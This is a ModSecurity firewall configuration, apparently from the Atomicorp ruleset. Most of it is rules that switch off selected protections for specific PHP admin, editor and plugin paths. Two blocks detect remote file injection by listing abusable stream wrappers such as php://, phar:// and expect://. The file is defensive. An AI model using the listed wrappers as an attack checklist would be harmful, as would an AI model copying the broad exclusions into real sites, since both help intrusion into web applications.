SecRule REQUEST_FILENAME "/ntunnel_mysql\.php" "phase:2,id:92204,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/magmi_saveprofile\.php" "phase:2,id:92205,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/magmi_saveconfig\.php" "phase:2,id:92206,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/details\.php" "phase:2,id:92207,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/detail_ispravak\.php" "phase:2,id:92208,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/page/addedit\.php" "phase:2,id:92209,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/booking_apartman_podaci\.php" "phase:2,id:92210,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/sfpadmin\.php" "phase:2,id:92211,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/iwp/ajax\.php" "phase:2,id:92212,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/setup/config\.php" "phase:2,id:92213,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/ziegenproblem\.php" "phase:2,id:92214,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/image\.php" "phase:2,id:92215,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92216,t:none,pass,nolog,skipAfter:END_RULES_92216"

SecRule ARGS|!ARGS:pagex|!ARGS:/refer/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:f "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:341737,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:pagex|!ARGS:/refer/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:f "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341738,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"


SecMarker END_RULES_92216

SecRule REQUEST_FILENAME "/unesi\.komentar\.inc\.php" "phase:2,id:92217,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/tiki-auto_save\.php" "phase:2,id:92218,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/querywindow\.php" "phase:2,id:92219,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/static_content_editresult_mobile\.php" "phase:2,id:92220,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/form/configuration\.php" "phase:2,id:92221,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/site_checker\.php" "phase:2,id:92222,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390712"

SecRule REQUEST_FILENAME "/ins_upd_data\.php" "phase:2,id:92223,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ajaxfilemanager\.php" "phase:2,id:92224,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"

SecRule REQUEST_FILENAME "/ajax_get_file_listing\.php" "phase:2,id:92225,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"

SecRule REQUEST_FILENAME "/admin/assets/inc/bin/general\.services\.php" "phase:2,id:92226,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/ajax_image_editor\.php" "phase:2,id:92227,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"

SecRule REQUEST_FILENAME "/beheer/toolboxx\.php" "phase:2,id:92228,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/aktualnolight_elementi\.php" "phase:2,id:92229,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/wp-content/plugins/counterize/counterize\.php" "phase:2,id:92230,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/modules/v6_pages_engine\.php" "phase:2,id:92231,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/modules/v7_pages_engine\.php" "phase:2,id:92232,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/wwwsqldesigner/" "phase:2,id:92233,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/bottom\.php" "phase:2,id:92234,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:92235,t:none,pass,nolog,skipAfter:END_RULES_92235"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:module "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:341739,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:module "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341740,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"


SecMarker END_RULES_92235

SecRule REQUEST_FILENAME "/clients/admin/addonmodules\.php" "phase:2,id:92236,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/graps-cms\.php" "phase:2,id:92237,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/sadrzajdrag_elementi\.php" "phase:2,id:92238,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/listaproperty\.php" "phase:2,id:92239,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/plazadmin\.php" "phase:2,id:92240,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/filtteri" "phase:2,id:92241,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/cgi-bin/jrscgi/update\.cgi" "phase:2,id:92242,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:92243,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390704"

SecRule REQUEST_FILENAME "/wp-admin/user-edit\.php" "phase:2,id:92244,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/options-website\.php" "phase:2,id:92245,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/savefile\.html" "phase:2,id:92246,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380016"

SecRule REQUEST_FILENAME "/database/cashtrack\.php" "phase:2,id:92247,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/wp-content/plugins/winkelmodule/naardab\.php" "phase:2,id:92248,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/write-post\.php" "phase:2,id:92249,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/website/beheer/edit\.php" "phase:2,id:92250,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/potenzen_1_formmailer\.php" "phase:2,id:92251,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/admin/catalogusbijwerken\.php" "phase:2,id:92252,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/livechat/server\.php" "phase:2,id:92253,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin_updatemedia\.php" "phase:2,id:92254,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/afg_img_rsz\.php" "phase:2,id:92255,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/cms/pagina_edit\.php" "phase:2,id:92256,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/connectors/resource/index\.php" "phase:2,id:92257,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/connectors/index\.php" "phase:2,id:92258,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=380018"

SecRule REQUEST_FILENAME "/getxml\.php" "phase:2,id:92259,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ajax-tab\.php" "phase:2,id:92260,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:92261,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/livechat/mobile/chat\.php" "phase:2,id:92262,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340574,ctl:ruleRemovebyID=340573"

SecRule REQUEST_FILENAME "/soap\.hsp" "phase:2,id:92263,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390712,ctl:ruleRemovebyID=340121,ctl:ruleRemovebyID=340122"

SecRule REQUEST_FILENAME "/mailman/admindb/*" "phase:2,id:92264,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"

SecRule REQUEST_FILENAME "/cms/save\.php" "phase:2,id:92265,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/sort_edit\.php" "phase:2,id:92266,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/geweest\.php" "phase:2,id:92267,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/project/project_item\.php" "phase:2,id:92268,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-content/plugins/pdfjs-viewer-shortcode/web/viewer\.php" "phase:2,id:92269,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/process_submission\.php" "phase:2,id:92270,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ajax-upgradetab\.php" "phase:2,id:92271,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=341155"

SecRule REQUEST_FILENAME "/updatemail\.php" "phase:2,id:92272,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/toevoegen_gemee\.php" "phase:2,id:92273,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/cms_gemeentetiel/" "phase:2,id:92274,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/deleteblogui\.php" "phase:2,id:92275,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/check_mandatory_fields\.php" "phase:2,id:92276,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/assets/components/migx/connector\.php" "phase:2,id:92277,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/administration/modifier/formulaire\.php" "phase:2,id:92278,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:92279,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/admin/edit_config\.php" "phase:2,id:92280,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admineditevent\.php" "phase:2,id:92281,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/article_edit\.php" "phase:2,id:92282,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/serendipity_admin\.php" "phase:2,id:92283,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/upload_resize\.php" "phase:2,id:92284,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

